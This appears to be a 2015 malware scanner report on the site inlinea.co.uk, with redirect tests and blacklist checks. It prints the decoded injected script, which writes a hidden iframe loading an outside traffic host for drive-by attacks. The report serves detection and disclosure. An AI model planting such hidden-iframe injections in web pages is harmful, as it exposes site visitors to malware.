Scanned pages/files
Request | Server response | Status |
http://inlinea.co.uk/ | 200 OK Content-Length: 48604 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): percent-encoded JavaScript passed to eval(unescape(...)).
Decoded script:
window.status='Done';document.write('<iframe name=54343774e49 src=\'http://alltraff.cn/traff.php?'+Math.round(Math.random()*194140)+'5c6bdc160c\' width=340 height=571 style=\'display: none\'></iframe>')
<iframe name=54343774e49 src='http://alltraff.cn/traff.php?1879325c6bdc160c' width=340 height=571 style='display: none'></iframe>
Antivirus reports:
http://inlinea.co.uk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: inlinea.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Sep 2015 16:45:53 GMT
Upgrade: TLS/1.0, HTTP/1.1
Upgrade: TLS/1.0, HTTP/1.1
Accept-Ranges: bytes
ETag: "2280574-bddc-4417d00ae8f40"
Server: nginx/1.7.6
Content-Length: 48604
Content-Type: text/html
Last-Modified: Mon, 17 Dec 2007 15:24:05 GMT
...48604 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: inlinea.co.uk
Referer: http://www.google.com/search?q=inlinea.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=inlinea.co.uk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://inlinea.co.uk/
Result: inlinea.co.uk is not infected or malware details are not published yet.